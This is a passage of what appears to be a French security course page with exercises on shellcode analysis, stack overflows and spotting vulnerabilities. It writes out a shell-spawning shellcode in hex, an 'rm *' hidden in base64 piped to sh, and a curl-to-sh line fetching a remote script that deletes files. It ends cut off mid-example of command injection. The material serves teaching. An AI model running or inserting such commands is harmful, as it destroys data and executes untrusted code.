Cours

— 0001-01-01

Pwn Classique (suite) Les exercices pour la section sont disponibles sur workspace dans /cours. Shellcode Désassemblez et comprenez le comportement du shellcode suivant: 31 c0 31 d2 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 b0 0b cd 80 Tracez l’exécution du shellcode (état de la pile et des registres) et assurez vous de bien comprendre son fonctionnement. La commande suivante vous sera surement utile.

— 0001-01-01

Pwn Classique Les exercices pour la section sont disponibles sur workspace dans /cours. Pass 1 Pass 1 sera fait en démonstration. Par contre, à titre de révision, je vous suggère de prendre la peine de refaire Pass 1 dans un débogueur afin de bien comprendre ce qui se passe en mémoire. Assurez vous d’être en mesure de bien identifier les variables sur la pile et l’effet du débordement sur celles-ci.

— 0001-01-01

Revue des logiciels Mettez en relation chacun des concepts suivants dans un graphe/schéma/Mind Map simple. Programme Écriture (programmation) Toolchain Idée Ordinateur Code source Résultats Programmeur Exécution Données (input) Discutez puis donnez votre définition d’un bug. Où se situe les bugs dans votre schéma de la question 1? Parmi les exemples suivants lesquels sont des vulnérabilités? rm * echo cm0gKgo= | base64 -d | sh curl http://www.sh4ddy.xyz/rmstar.sh | sh (Le nom du fichier est un bon indice de son contenu) L’application checkhost prend un paramètre host et puis vérifie s’il répond au ping afin de savoir s’il est disponible: curl 'http://localhost/checkhost/?